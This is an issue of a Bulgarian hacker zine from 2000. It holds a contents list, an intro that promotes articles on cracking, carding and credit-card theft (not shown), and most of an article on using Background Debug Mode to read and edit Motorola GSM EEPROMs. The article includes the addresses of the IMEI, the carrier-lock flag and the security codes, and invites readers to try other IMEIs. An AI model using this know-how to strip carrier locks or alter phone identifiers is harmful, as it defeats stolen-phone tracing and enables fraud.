Warning: This text file's to be used for educational purposes only !
If you find any Anti-BTC, H/C/P/A/W materials to be offensive
STOP reading this text file right NOW!
Phreedom shall not be liable for any direct or indirect damages
caused by the use / misuse of the information below !
This .txt file should be distributed unmodified and free of charge
Reproductiong of any part of the materials below should be done
with the strict permission of the respective author
. . . ... www.phreedom.org . ...
.. . . phreedom.orbitel.bg ... . . . . . . .......
t e c h n i c a l
. m a t e r i a l s
. | [ h / c / p / a ]
| |
/---\ \---\ /---. /--. /--. .---/ .---\ .---\
|___/ ' | | |__/ |__/ | . | | | | |
| ' ' \--- \--- \---' \---' \ '
|
' . .. ... [ m a g a z i n e ] : since 1 9 9 7
. . ...
i s . s u e
. 0 0 0 1 0 1 1 0
..... . . . . . . . . . . .... . . . . . . 10 . 03 . 2000
.
T O C .
. . . . . ... . . .
a r t i c le . a u t h o r
. . . . ... . . .
Intro Solar Eclipse
Background Debug Mode for Motorola GSMs Kuche
Cracking PC CLub 1.0 DaFixer
Obeshtanie pred Drugarq ManiaX Phreedom Staff
Detecting InterNet Connections ManiaX Killerian
Cracking Java Applets Solar Eclipse
Cracking MMTools DaFixer
Wireless/Packet Modems ADA
Cracking WinHack2 DaFixer
Cracking PerlBuilder 1.0 mr-drone
Interview with a BG carder EXo
Stealing 100000 Credit Cards in 21 Days Solar Eclipse
Microsoft Wordpad Buffer Overflow Research Solar Eclipse
. .. parwo floodq prowidera sled towa go triq Anonymous
.
.
staff@phreedom.org
. . . .. .... .. .. . . .. . . . . .
[ ManiaX ] founder .
. [ EXo ] editor in chief .
[ Solar Eclipse ] assistant editor
. [ General Failure ] foreign relations .
. [ IronCode ] typografical fixer
[ kay ] maillist
. . . . . .. . . .. .. .... .. . . .
.
feel free to get in touch any time
.
<![CDATA[
. . . . . . . . . .. . ... . ...............
Intro By Solar Eclipse
........... . . . . . . . . . . . . . .
Towa e broi 22 na Phreedom Magazine. Tozi broi dostiga do was
blagodarenie na tochkite (ASCII 0x2e), na koito Solar Eclipse qwno e golqm
fen. Nadqwam se i na was da wi hareswat, pone malko. Zashto sa tolkowa
hubawi tochkite? Ami zashto sa krugli... a wsichki krugli neshta sa hubawi.
Ako ne mi wqrwajte, zatworete se w edna staq i si wzemete malko tochki.
Nikakwa hrana, komputri ili telewiziq - samo tochki. Ne izlizajte ot tam
nqkolko dena i shte widite kolko mnogo shte zapochnete da gi hareswate.
Naprawo nqma da movete da viweete bez tochki weche. Goworq ot lichen opit,
kakto weroqtno se doseshtate :-)
Ok, stiga s tezi gluposti. Razgrushtajki nowiq broi, weroqtno trupnete w
ochakwane da razberete kakwo ima w nego. Prusta wi e na PgDn butona, gotow
da go natisne i durvi dokato zacherwenite wi ochi neturpeliwo poglushtat 150
KB wisokokachestwena technicheska informaciq. Na edin duh. Znam che ne e
lesno da se sdurvite, i zatowa nqma da wi dosavdam s towa Intro prekaleno
dulgo. Shte goworq po sushtestwo.
Kakto weroqtno znaete, tozi broi izleze tochno nawreme (kolkoto i
newqroqtno da zwuchi). Publichnata poziciq na Phreedom Staff-a e che nie
nqma da se izwinqwame na nikogo za towa koeto se sluchi prez 1999 godina, no
wuperki towa shte se postaraem to da ne se powtarq za w budeshte. Celta e da
izkarwame broewe na wseki 2-3 meseca. Towa shte ni dade okolo 4-6 broq na
godina, koeto zwuchi dosta dobre.
Razbira se, kakto i winagi dosega, uspeha na Phreedom Magazine zawisi
edinstweno ot WAS. Ot washto velanie da spodelite znaniqta si i da obmenite
opit. Ne samo ot nashite, no i ot washto wduhnowenie i usiliq. Neka citiram
chast ot Phreedom Credo-to:
V. Koj bi trqbvalo da chete Phreedom:
. Hora, koito iskat da nauchat neshto novo;
. Hora, koito mogat da ni nauchat na neshto novo (ne samo nas, a i
wseki kojto reshi da chete Phreedom);
. Hora, koito ne smqtat,che tova da imash mozuk w glawata e i
da go polzwash po prednaznachenie e neredno;
. Hora, koito ne prinadlezhat na grupatana totalnite lameri, koito
nikoga s nisto ne smeiat da se zahwanat;
Ne budete chat ot poslednata grupa! Naj-tuvnoto e che naposleduk wse
poweche i poweche se sreshtat hora, koito narichat sebe si 'lameri' i dori
se gordeqt s towa... "Az sum lamer, no kakwo ot towa: wsichki sa bili
lameri" Towa e edno ot naj-mizernite neshta koeto chowek move da izreche.
Towa e primirenie sus sobstwenata si glupost, primirienie s murzela i
mizeriqta. Towa e propadane w dupka, ot koqto izlizane nqma... Wqrno e che i
naj-dobrite sa zapochwali ot nqkude, no te nikoga ne sa narichali sebe si
lamer. Ako ti si istinski hacker, ako smisulut na twoq viwot e da se uchish
i da wurwish napred nezawisimo ot pregradite, to ti nikoga ne bi narekul
sebe si lamer. Towa e negowiqt (ili nejniqt) naj-strashen koshmar. Dori samo
misulta za towa che move bi nqkoi bi mogul da te pomisli za lamer shte
nakara istinskiq haker da se zabie oshte po-nadulboko w knigite i w
sourca. Za da move sled wreme da wdigne ochi, da pogledne gordo sweta okolo
sebe si i da kave:
The world of the electron and the switch. Towa e moqt
swqt. Az sum go suzdal i az imam silata da go razrusha.
Moga i da go naprawq po-dobur. Az sum HACKER.
Zamislete se nad towa.
Stiga s lirichnite otkloneniq, neka da se wurnem na temata. A kakwa
beshe temata, pitate se wie? Temata beshe Phreedom Magazine Issue 22. Ne
twurdq che towa e naj-dobriqt broi izdawan nqkoga, no smqtam che kato za
broi izdaden za 2 meseca e suwsem prilichen. (EXo: I kato za purwi broj
podgotwen ot Solar Eclipse - naprawo chudesen...).
Kakwo shte namerite w nego ? Edna golqma chast ot statiite razglevdat
cracking-a. Towa e edna otnositelno nowa tema za Phreedom i se radwam che
weche ima nqkolko nowi awtora, zanimawashti se w tazi interesna oblast.
Pozdrawi na mr-drone i DaFixer za dobre swurshenata rabota. Predlagame wi i
oshte edna statiq, zanimawashta se s neshto (lichno za men) napulno nowo:
Java cracking. Sushto taka imame dwe tehnicheski statii na tema Wireless
komunikacii, po specialno GSM i PacketRadio. ManiaX otnowo shte ni zanimae s
lyubimata si tema: obqsnenie na towa shto e Internet, ima li to pochwa u nas
i ako da - to kak da go otkriem. Kato priznanie za neizcherpaemata mudrost i
moshtna podkrepa, Phreedom Staff-a e podgotwil "Obeshtanie pred Drugarq
ManiaX Killerian". Petiletkata za chetiri godini, po stahanowski, ako
razbirate kakwo iskam da kava. Rodenite sled 1989 weroqtno nqma da shwanat
za kakwo stawa duma. (EXo: imame li takiwa chitateli. Ako ima da se obadqt -
cherpq gi po edin BlackDog :))))
Za tezi ot was, koito se chudqt kak da izkarat pari za more towa lqto,
Solar Eclipse e podgotwil monumentlniq si trud "Stealing 100000 Credit
Cards in 21 Days". Nadqwam se da wi haresa, i ne go wzimajte mnogo
naseriozno, da ne stane nqkoi sakatluk. Za po-tehnicheki orientiranite
chitateli ima i statiq poswetena na procesa na isledwane na edin buffer
overflow w Windows sreda i rezultatite ot nego. Nakraq shte zawurshim s edin
IRC log, koito nqkoi biha kwalificirali kato fun, no na men lichno mi se
doplaka kato go prochetoh. Az lichno smqtam che towa e edno ot
naj-mizernite i dolni neshta koito chowek move da swurshi. Prochetete go i
wie i si kavete mnenieto.
Ako wse oshte ne znaete kak, posetete publichniq Message Board na
Phreedom na address:
http://phreedom.orbitel.bg/mboard/
ili
http://mboard.phreedom.org/
Razbira se, predi da stignete do boarda shte trqbwa da preminete prez
filtura za lameri, koito za suvalene sprq mnogo poweche hora ot kolkoto
ochakwahme. (EXo: ne... nqma da se nalaga da prawite nisto drugo, oswen da
mislite s glawata si i da budete malko po-nabliudatelni).
Tyj kato se okazwa, che tozi broj e malko-ili mnogo cracking related se
radwam, che w nego ste ima i 1-2 off-topic materiali za fenowete na
ostanalite sferi ot technicheskoto znanie. Ne sym siguren dali teoriqta na
cardinga-a move da se okachestwi kato technichesko znanie, no sus sigurnost
interview-to s edin dosta naprednal BG carder ste bude interesno na mnozina
wannabe-ta.
Oswen pregled na broq, w Introto na Phreedom chesto se razglevdat i
interesni subitiq, koito sa se sluchilo dokato chitatelite trepetno sa
chakali nowiq broi. I tozi put nqma da podminem tazi tradiciq. Izminalite 2
meseca bqha otnositelno nasiten sus subitiq period.
Naj-ochakwanoto (i naj-malko oprawdaloto ochakwaniqta subitie) beshe
zwqrut, narechen Y2K. Mnozina ochakwaha kraq na sweta, nashestwie na
izwunzemni, ili neshto drebno, kato naprimer wsichki komputri po zemqta da
crashnat vestoko i da prichinqt "The End Of The World As We Know It". Za
shatsie (ili za neshtastie), nishto takowa ne se sluchi. Dori opaseniqta ot
shirokoobhwatni hakerski ataki nawruh Nowa Godina ne se oprawdaha. Za men
lichno towa beshe edna ot naj-skuchnite Nowogodishni noshti, sushto kakto i
za hilqdite sistemni administratori, chakashti da widqt kak naj-vestokite im
koshmari shte se sbudnat. (EXo: za men puk beshe prosto neveroqtna nowa
godina - izpokarah se sys wsichki blizki, teglih im edna majna i si izkarah
pochti (...) sam iz sofijskite ulici i w posledstwie w club. Chervilo. Ne
moga da wi opisha kakwa tochno swoboda izpitwah togawa)
Za wsichki koito ne znaqt: Kevin Mitnick e na swoboda. Weche movete da
prestanete da pishete "Free Kevin" po deface-natite websaitowe i da
izpolzwate "free" kato prilagatelno - "Kevin Free". Shegata nastrana,
problemite w viwota na Kevin edwa sega zapochwat. 30-godishen, prekaral 5
godini w kriene ot zakona i oshte 5 w lapite mu. Prewurnal se w ikona za
pokolenie hakeri. Sus sudebna zabrana da izpolzwa komputer, telefon s tonowo
nabirane i kakuwto i da e dostup do Internet. Nikoi chowek ne zasluvawa
towa. Problema e, che horata wse oshte ne razbirat, che dostupa do
tehnologiite i do Internet e ne priwilegiq, a osnowno choweshko prawo,
tolkowa purwichno, kolkoto i prawoto da dishash i da chetesh. Na nikoi nqma
da mu hrumne da zabrani na biwsh zatwornik da chete. No na Kevin Mitnick mu
e zabraneno da izpolzwa Internet - naj-golqmata informacionna sukrowishtnica
na chowechestwoto. Sumnqwam se che nqkoi ot was shte go naprawi, no na
websaita na Kevin (www.kevinmitnick.com) ima adres, na koito movete da
izprashtate donacii, s koito da pomognete na Mitnick da izgradi viwota si
nanowo. Nezawisimo ot towa kolko e winowen toi, prawitelstwoto na
Suedinenite Amerikanski Shtati go e preebalo 100 puti poweche, za nazidanie
na ostanlite. Jesus sushto e umrql za nashite grehowe... ili pone taka
kazwat.
Poslednoto subitie, na koeto iskam da oburna wnimanieto wi e DDoS
atakata, koqto uspeshno zatwori Yahoo, ebay, ZDNET i oshte nqkolko golemi
saita. Wupreki che reakciqta na obshtestowoto beshe mnogo golqma, towa ne e
nishto nowo i malcina security experti bqha iznenadani. Nqkoi ot tqh dori
dowolno potriwaha ruce - kolkoto poweche horata se plashat ot hakerite,
tolkowa poweche rabota (i pari) shte ima za security konsultantite. Dori
pichowete ot L0pht bqha prakticheski zasipani s pari ot @Stake. Nadqwam se,
che towa nqma da im poprechi da produlvawat izkluchitelno elitnata si
rabota.
Towa e. Chete spisanieto i mu se radwajte. To e washe.
Umnata ! I ne gazete trewata...
Solar Eclipse
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Background Debug Mode for Motorola GSMs By Kuche
........... . . . . . . . . . . . . . .
I. Za kakvo e tazi statija (intro)
II. BDM v detajli
III. EEPROM-a na igrachkata
1. Smjana na melodijata
2. Startup Text
3. Testova karta
4. Razkodirane s BDM
5. Menuta
6. Drugi
IV. Neotkriti vyzmozhnosti
V. Otkriti nevyzmozhnosti
VI. Linkove
VII. Sykrashtenija
VIII. Zak(l)uchenie
I. Za kakvo e tazi statija (intro).
Predi djakolko meseca, vujchoto mi cyfna v nas s njakolko GSM-ta,
Motorola d160,s predlozhenie za razkodirane. Togava bolnata mi tikva se navi
na tova mrysno zanjatie. Sled kato ne stana nishto s djagite predlagani po
internet,se prestrashih da probvam BDM. Goljamo beshe i uchudvaneto mi,
kogato shemkata proraboti ot raz. No sled kato razbrah kvi sa vyzmozhnostite
na BDM-to reshih da ne spra do tuk (osven tova sichki ME-ta bjaha sys
ednakyv IMEI). V statijata shte se govori predimno za EEPROM-a, i za dannite
zapisani v nego. A predimstvo na BDM, e che mozhe da chetete cjalata
nalichna pamet, bez da ja razpojavate (na DSP-to e mask programmable).
Statijata e pisana po vreme na praktika s desetina d160-tki (zatova predimno
za d160 vazhat napisanite neshta, no i razlikata s drugite modeli e syvsem
malka - otnosno EEPROM dannite,Firmwareto e syvsem razlichno), s razlichhni
versii na firmwareto (3), i lock-nati za razlichni provideri.Syshto tyka mu
e mjastoto, mislja (dali?), da spomena che 60% ot infoto go ima na
stranicite na Janus [ 2 ], no kakvo da napravja, kato tam ima vsichko za
Motorola(makar i razpiljano). No pyk veche njama Firmware za download.
BDM e sykrashtenie na Background Debug Mode (prevoda-mozhete go i sami),
kojto se izpolzva pri nastrojka, proverka i flash-vane na njakoi
Motorolski MCU-ta. Tova sa naprimer 68HC16 (CPU16), 683xx (CPU32) i dr.
Syshtestvuva v 2 varianta-16 bitov za CPU16 i 32 bitov za CPU32, kato
razlikata e spomenata v [II]. Interes (za statiata) predstavljava
MC68338(2), kojto se izpolzva v dosta ot GSM modelite na Motorola (vypreki
che mozhe bi sa malko starichki). Takiva sa d160,d170, cd520, **00, StarTAC,
cd9*0 i dr., kakto i njakoi GSM-i ot drugi proizvoditeli.
Kym statiata ima i dwe 2 JPG-ta, v koito e opisana (nadraskana) shemata
na harduera (ne e strashna - 2IC-ta, 2 kondenzatora i 2 rezistora) i na
edno PCB sobstwena izrabotka. Softuera, kolkoto i da e bugav, e
edinstvenijat freeware, kato e vizmozhno da si napishete sobstven. Source e
na [ 1 ]. BDMFLASH e po -dyrven ot BD32, no za smetka na tova, mu lipsvat
bugovete harakterni za BD32. Naj - dobre e da imate i dvata [ 4 ], [ 3 ].
Problem e copyright-a na firmwareto (i na windoz, no tova e druga tema na
razgovor) - vypreki che njamame(-te) pravo da go disasemblirate, vi
preporychvam IDA (full version - poddurva Motorola CPU-ta), kakto i 68kasm -
asembler za 68k-ta. (naposledyk IDA-ta me predade, taka che ne i se
nadjavajte mnogo). V cjalata istoria ima edin neudoben moment - mozhete da
skapete sichko, ako ne vnimavate kakvo pravite (az go napravih, no za
shtastie imah dostatychen broj ednotipni GSM-ta) - trjabva predi vsichko da
si dumpnete EEPROM-a i FLASH-a. Tova mozhe da stane v 2 fajla ili v edin, no
e po-dobre da imate EEPROM-a na otdelen dump (toj e celta na zanjatieto).
Ako vi se stori che firmwareto e starichko mozhete da si go update-ne te
(pri mene imashe 85.00.27, koeto beshe update-nato na 85.00.56). Estestveno
tova e se edno da si instalirate piratski windoz. Goleminata na FLASH-a e
1Mb, a na EEPROM-a 8kb, zapochvashti ot $120000 (po-natatyk sys $ se
oznachavat hex chislata, ne samo zashtoto me myrzi da pisha 0x, ami i
zashtoto v BD32 taka se oznachavat 16tichnite chisla). Dumpa mozhe da se
napravi kakto s BDMFLASH, taka i s njakolkoto makrosa za BD32 [ 5 ], koito
se unzipvat v direktoriata mu. V statijata sa opisani predimno nachini za
promjana na nastrojkite (njakoi ot koito mogat da se smenjat s clone card,
koeto taka i ne mozhah da podkaram). Druga osobenost, kojato ne e zle da
spomena,e che ima verojatnost da se otlepi, ot prenagrjavane, pytekata,
kydeto se zapojava interfejsyt - koeto e leko neprijatno (napravo mnogo!).
Kato za intro mislja che sym kazal vsichko po-vazhno (da ne zabravja, che
edinia ot pinovete (WDOG), trjabva da byde vyrzan kym +5V-zahranvaneto idva
ot PS/2 port ili ot samoto ME - L275). Na [ 6 ] mozhete da namerite
razpolozhenieto na podlozhkite v ME-to.
II. BDM v detajli
Edva li njakoj go interesuva tova, no se pak ne e losho da go ima.
Pylnoto opisanie go ima na [ 7 ]. Tyka estestveno e dosta po-kratko.
Pinovete na MCU-to, koito imat neshto obshto s BDM sa :FREEZE,/RESET, /IPIPE
(DSO), /IFETCH(/DSI), /BKPT(DSCLK). Pri CPU16 /IFETCH = IPIPE1, a /IPIPE =
IPIPE0, /DSI = DSI kato razlikata mezhdu poslednite e samo inversijata na
ukazanite mesta (/). FREEZE e ouput pin, kojto pokazva dali CPU-to e v BDM
(high). Kogato na FREEZE ima 0, IPIPE i IFETCH se izpolzvat za prosledjavane
na instrukciite, obrabotvani ot CPU-to. Tazi vyzmoznost ne e vkluchena v
tozi variant na interfejsa. BKPT e input pin, i se izpolzva za zajavka za
BDM, kojato se izpylnjava sys sledvashtata instrukcija. Kogato CPU - to e v
BDM, (FREEZE - high), IPIPE stava serial output, IFETCH - serial input, BKPT
- clock. Po taka poluchenata seriina vryzka, CPU-to priema instrukcii
(IPIPE), obrabotva gi, i vryshta rezultat (IFETCH), v 17 - bitovi dumi. Pri
greshka starshijat bit e 1, inache 0. Instrukciite, koito mogat da bydat
predavani chrez BDM,sa sravnitelno malko,kato pylen spisyk mozhe da se
nameri v sourceto,spomenato po-gore. RESET-a se polzva s BKPT. Prilozhenata
shemka e sravnitelno prosta i lesna za izrabotka, no ne predlaga
izpolzvaneto na pylnite vyzmozhnosti na BDM. Njakyde po mrezhata bjah
sreshtnal da se prodava pylnijat variant na skromnata cena ot njakolko
stotin $. V samoto ME,ima edno CPU (A stiga be!), flash pamet s firmwareto,
EEPROM s configuracionni danni, SIM chetec, Modem (imasht neshto obshto s
TRx-a),LCD s kontroler i kbd. Polovinata ot tezi neshta si imat sobstveni
adresi v pametta (neshto kato $2f8 za PC-to (lame)).Drugata polovina e
vyrzana za portovete na CPU-to direktno.Pootdelno nadolu ima za EEPROM,
FLASH, KBD, LCD.
III. EEPROM-a na igrachkata
Toj mozhe da byde sjakakyv, kato v povecheto e na Atmel (vkl. na d160).
Po dolu sa dadeni njakoi vyzmozhnosti, oznacheni s rimski chisla. Te sa
po-interesni (pone spored mene). Drugite sa zavrjani v edno cjalo pod nomer
[6].
1. Smjana na melodijata
Edna ot melodiikite ( edinstvenata kojato mozhe da se smeni) e zapisana
na adres $861. Configuracijata e na adres $884 - bitove 15:10 sa za
dylzhina(v noti), 9:8 sa za tempo, 7:1 bez znachenie, 0 e zadyl- zhitelno
1.Na adresi $861-883 se zapisvat notite na melodijata kakto sledva: bitove
7:5 prodylzhitelnost, 4:0 nota, kato 00 e pauza, a 1f e naj-gorno do (ili
kakto e tam po muzikantski). Prodylzhitelnostta e: 00 - 1/16;$20 - 1/8;
$40 - 1/4;$60 - 1/2;$80 - 1;$a0 -2;$c0 - 4;$e0- 8(vypreki che sym zle s suf-
lezha, neznam da ima dvojni i po-golemi noti - no vse pak sa fakt ). Ako se
izpolzva test-karta ( ili $13 na adres $3B ) s komanda 1542# mozhe da si
chuete proizvedenieto. Primer za takava melodiika namerih na [ 8 ] :
Addr:$861 862 863 864 865 866 867 868 869 86a 86b 86c 86d 86e Val :$ 03 0B
0C 0A 0B 01 0C 02 17 02 02 02 02 02
2. StartUp Text
Zapisan e na adres $33F v EEPROM-a, obiknovenno e MOTOROLA <0A> GSM,
kydeto <0A> = <Enter>. Mozhete da si nagruhate do 24<0A>24 znaka text, kojto
se pojavjava pri vsjako vkluchvane na aparata.
3. Testova karta
Tazi igrachka struva po magazinite(ako ja namerite)$50-200. Estestveno s
BDM ne samo mozhe da se emulira ( ako znaete adresa, az ne go znam (IDA) ),
no i pri setvaneto na bit 4 na adres $3B , vi predostavja vyzmozhnostta pri
zadyrzhane na butona [#] da se vleze v Test rezhim bez BDM ili Testova
karta.Pylno opisanie na komandite ima na syotvetnija link [ 1 ]. Tyka mozhe
da se spomene che njakoi ot komandite sa prazni, i udobni za vkl. na
sobstven kod ( slagate edno jmp na syotvetnija adres, kydeto sedi jmp kym
prazen sub). Njakyde chetoh che pusnali cjala seria aparati sys setnat tozi
bit, pri koeto stanalo neshto kato sluchkata s NightCam na Sony.
4. Razkodirane s BDM
(Tova e *samo* za psihopati ili zdravi fenove). Vypreki psihicheskijat
tormoz za pretochvaneto na 15MB IDA (10x na Solar Eclipse), firmwareto se
okaza goljama kuchka. (kakto e spomenato po-dolu). Disassembliraneto beshe
nefyzmozhno (pone za IDA-ta:(((( ), no kakto i da e, edva li si zasluzhava
tolkova zor samo za razkodirane.Ako tolkova vi e pritrjabvalo eto
edinstvenija kod kojto znam: $052:4A7462020000000064; $3AB:00 ; $3B0:C42B.
Pyrvoto e kodiran IMEI-yt na aparata[ 9 ], vtoroto e adresa na SP Lock-a (03
e enabled/ 00 - disabled). I nakraja groznoto CRC , koeto taka i ne namerih
kyde se izchisljava (tova stava s clone card emulator,kojto taka i ne trygna
[10 ]).Pri njakoj ako stane nomera, mozhe da probva s razlichni IMEI - ta.
Naj-verojatno e tipovete ot SP-to da zabelezhat che ima mnogo aparati s edno
i syshto IMEI, i da reshat da pravjat prostotii. Tozi IMEI e pravilen *samo*
za aparati s 0010109 versia na EEPROM kartata. Tova mozhe da se proveri s
edna programka [ 11 ], kojato pokazva i dosta info izdyrpano ot EEPROM dump,
kojato e i absolutno neobhodima.
5. Menuta
V aparatite njakoi menu-ta sa izklucheni, za da ne predizvikvat
psihicheski tormoz na sobstvenicite, kakto i pri neobhodimost da im izcocat
parichkite. Karta na menutata ima na [ 12 ], kato stojnostite se grupirat po
8 i se zapisvat na adresi $A0... Sred tjah ima dosta hitrini, za koito dori
mogat da vi pognat kato kucheta.
6. Razni drugi
'Hmmmm,'-shte rechete-'mnogo byrzo stignahme do 'razni-te'' . Emi taka
e, kvo da se pravi.Eto i adresite v slednija format : ADDR,LEN,INFO
$36F,3,Security code - 6 cifri,123123=21 13 32; $372,2,Unlock code - 4 cifri
analogichno na security-to.$5B0-$5CC,prez 4,kodiran SP kod, spored njakoi e
XOR-nat s F6F6F6F6 i razmenen po gornia nachin. $FBC,do kraja, phonebook-a.
$0,2,Checksum na chasti ot EEPROM-a.Opravjat se po ukazanija na linka nachin
(tozi za testovata karta). Ima kopie na sumata i na $910. Vsichki stringovi
danni mogat da se vidjat i smenjat s MotTool [11 ].
7. CRC-ta
Nakraja, za naj-gadno shte spomena CRC-tata, koito se motajat iz
EEPROM-a. Tova e CRC-to na IMEI+SP,s neizvesten polinom(IDA).Pri njakoi novi
modeli ima i edno prokleto chipche- DS2401, koeto ebe(mmmmmm cinizym) mamata
na modificiraneto na EEPROM-a. Info za nego ima na [ 13 ].To pak e na
CRC-ova osnova. Na syshtija link ima drasnat i edin red za emulator na
DS2401 s PIC 12C509 (Tija PIC-ove se za nezakonni raboti se polzvat
neshto.....).
III. Periferii
Ot periferiite edinstveno za LCD-to i KBD-to namerih info v edin fail,
na kojto linka, neznam dali bih mogyl da go namerja, zashtoto po onova vreme
tezi neshta mi bjaha tymna india.(d160HW.zip). A i IDA-ta mi izigra kofti
nomer, che nemozha da disasemblira firmwareto-za taja kucnja po-dolu pishe.
1. LCD
Na zadnata strana na LCD-to ima kapsulovan chip (Hitachi 44780), kojto
za da se polzva e neobhodimo da se zapishat v RAM-a syotvetnite regi-
stri. LCD-to izpolzva 2 adresa - edin za kontrol - $ffa001 i edin za danni -
$ffa000. A tova sa registrite koito trjabva da se setnat predi upotrebata na
gornite (tova izobshto njamashe da mi mine prez tikvenika,ako ne bjah vidjal
spomenatijat fail) :$fff400->$0C;$fff488->$12f7; $fffa58->$ffa03230. Stojno-
stite, kydeto sa poveche, sa prodylzhenie na sledvashtijat adres. Simvolite
se zapisvat na danni-adresa,posledovatelno (Napr. kod 65 se zapisva $ffa000
->6;$ffa000->5). Samite kodove sa: 41-A;42 - B; ....., 61 - a; 62 - b.....,
specialni simvoli <40. Na kontrol-adresa pyk, se zapisva po syshtija nachin
informacija za ikonite (1/0), polzicija na zapis,izchistvane na ekrana,i dr.
Za syzhalenie, tova info e oshte ne dobre razraboteno, zashtoto fajla go
namerih bukvalno predi 2 dena,i ne sym se zanimaval s nego(no tova ne prechi
da opitate - tyka pone njama strashno). Link za DOSTA info za LCD-to -[15].
Na nego ima dori info kak da si napravite sobstveni simvoli (kodove ot 0
do 7).
2. Klaviatura (ili kvoto e tam....)
V po-gore opisania fail namerih i malko info za matricata na kbd-to.Tja
Polzva Port E i Port F na MCU-to za matrica. PortE: $fffa17 - Pin
Assignment(0).$fffa15 -I/O 1 za input 0 za output.Adres za danni $fffa13 i
$fffa11. PortF: $fffa1f - Pin Assignment(0).$fffa1d -I/0, syshtoto kato
PortE,$fffa19 i $fffa1b sa adresi za danni. Cheteneto stava s podavane na
posledovatelno 1-ci na PortE[7:3],i se gleda rezultatyt na PortE [2:0] i
PortF[4:3]. Matricata e slednata:
E7 E6 E5 E4 E3
[vlm] [OK] [<-] [8] [1] E0
[->] [C] [7] [6] E1
[#] [5] E2
[^] [0] [4] [3] F3
[M] [*] [*] [9] [2] F4
Infoto za LCD i KBD e dosta polezno, ako sednete da pravite GSM-a na
neshto drugo, ili pone da se ebavate s firmwareto. Az, ne che se hvalja, ama
tova se opitvam da napravja. Tuka e momenta da spomena, che njamam nishto
protiv Motorola ( osven skapanija pomiar pred ofisa im, kojto iskashe da ni
izjade, mene i ADA-ta), taka che ako imat neshto protiv mojto
disassemblirane ( za 'educational purposes'), da zemat da mi pratjat malko
knishki (da se ucha ot tjah, a ne ot firmware-to, shtoto po magazinite kur
ima ;-PP ). A dotogava smelo napred. Firmware-to , kakto spomenah po-gore e
v 8MBit(1Mb) flash ROM, obiknoveno na AMD ili Intel. Tyk-tame se sreshtat i
drugi. S BDM to se adresira ot $0, do $FFFFF, a EEPROM-a ot $120000, do
$121FFF. Za syzhalenie IDA-ta nemozha da disasemblira koda (ne celija),
koeto mi vyrza rycete. Zatova tyka vmesto kod na vsevyzmozhni prostotii,shte
trjabva da slozha samo njakoi po-osnovni neshta.
IV. Neotkriti vyzmozhnosti
S pomoshtta na asembler za 68k [ 14 ], mozhete da napishete sobstvena
programa, da ja kompilirate i da ja butnete na mjastoto na firmware-to, kato
za nachalen adres v .bin fajla trjaa da e $400. Taka mozhete da prevyrnete
GSM-a dori v bomba(sichko si ima,dori i RTC). Problema e infoto koeto osven
na [ 15 ] drugade *ne mozhe* da se nameri :(. Tova e i idejata kojato sega
mycha, i sigurno po-natatyka mozhe da se publikuva kato Anarchy(koeto neshto
kato obem namalja naposledyk).Ima njakolko udobni adresa, koito mogat da se
izpolzvat za jmp-vane kym samodelka, kojato e razpolozhena v svobodnoto
mjasto v ROM-a. Takova mjasto e 22# na test mode-to,kakto i oshte njakolko
null_sub-a, sreshtnati v otkysite kod, sneseni ot IDA. ( Za syzhalenie, ne
mozhe da se kazhe tochno kyde sa, zashtoto sa v funkcii, ne vikani ot
nikoi).
V. Otkriti nevyzmozhnosti
Dosta trudno e da se napishe kod, kojto da chete ot SIM kartata
danni,zashtoto podobno na izpolzvaneto na LCD-to , trjabva da se polzva
kontroler, chiito adresi i registri sa neizvestni(IDA). Podobno e i
izprashtaneto na danni kym/ot TTx i TRx na 'dolnata mu dupka', kakto i
izprashtane/priemane po njakoj kanal.Estestveno ako s malko poveche kysmet s
IDA-ta ili njakoj drug disasembler (syshto problem pri LPT-versijata na BDM,
software-to ima problem s setvaneto i izpolzvaneto na breakpoints ) mozhe da
stane chudesno izpylnenie po tezi tochki. (2-te).
VI. Links
Kakto se zabeljazva povecheto linkove sa kym www.tele-servizi.com/janus.
Tova e naj-jakijat sait za Motorola. Kofti e che mu reznaha chastta ot nego
sys firmware-to (neshto kato BTK i Phreedom predi vreme). V nego sa sybrani
pochti cjaloto neobhodimo info i software. Drugijat osnoven server e tozi na
motorola (estestveno), kydeto smenjat linkovete i organizacijata prez den.
[ 1 ] : http://www.mot.com/pub/SPS/MCU/ibm/bdm-v090.zip
[ 2 ] : http://www.tele-servizi.com/janus/
[ 3 ] : http://www.mot.com/pub/SPS/MCU/mcu332/bd32-122.zip
[ 4 ] : http://www.tele-servizi.com/janus/download/bdmflash.zip
[ 5 ] : http://www.tele-servizi.com/janus/download/bd32Util.zip
[ 6 ] : http://www.tele-servizi.com/janus/gsmbdm.htm
[ 7 ] : http://www.mcu.motsps.com/lit/app_notes/an1230.pdf
[ 8 ] : http://www.ut.ee/~mad/helin
[ 9 ] : http://www.tele-servizi.com/janus/texts/imei.txt
[10 ] : http://www.tele-servizi.com/janus/simemu.htm
[11 ] : http://www.tele-servizi.com/janus/download/mottool.zip
[12a] : http://www.tele-servizi.com/janus/medit.mnu
[12b] : http://www.tele-servizi.com/janus/download/meditx11.zip
[13 ] : http://www.dalsemi.com/DocControl/PDFs/2401.pdf
[14 ] : http://welcome.to/68000
[15 ] : http:/www.mcu.motsps.com/
[16 ] : http://www.myke.com/engres/lcd.htm
VII. Sykrashtenija
Njakoi sigurno sa si zadali vyprosa 'Kvi sa tia dumi be'. Tyka sa
pomesteni njakolkoto sykrashtenia izpolzvani v statiata.
ME - Mobile Equipment. Aparata.
IMEI - International ME Identificator. ID na aparata. Vseki si ima
unikalno IMEI, koeto e bilo zamisleno za otkrivane na kradeni
aparati.
DSP - Digital Signal Processor
BTK - Bjagajte ot Tezi Kozi
SP - Service Provider. Za BG zasega e samo Mobiltel.
SP Lock - Kofti moment, Kogato ME-to e SP Lock-nato, to mozhe da se
polzva s karti ot opredelen dostavchik.
VIII.Zak(l)uchenie
Pyrvo, iskam da kazha che sym izkluchitelno nedovolen ot obema na
statijata, kakto i ot tova che e v stil 'Tova e taka, ako ti e interesno
vizh link edi koj si',no kvo da se napravi, ako bjah trygnal da pisha
sichko,osven che shteshe da se pretrupa statijata, shteshe da se nalozhi da
dyrzhite PgDn dosta vreme, predi da stignete inte- resuvashtata vi chast
(ili napravo sledvashtata statija). Syshto, izkluchitelno mnogo
syzhaljavam, che ne mozhah da napisha malko kod za vmykvane vyv firmware-a.
Psuvajte me smelo (Shapka mu svaljam na ToPPeR, za Voltovete i Watovete v
predishnata statia, naprimer), samo taka moga da se promenja (Choveka bil
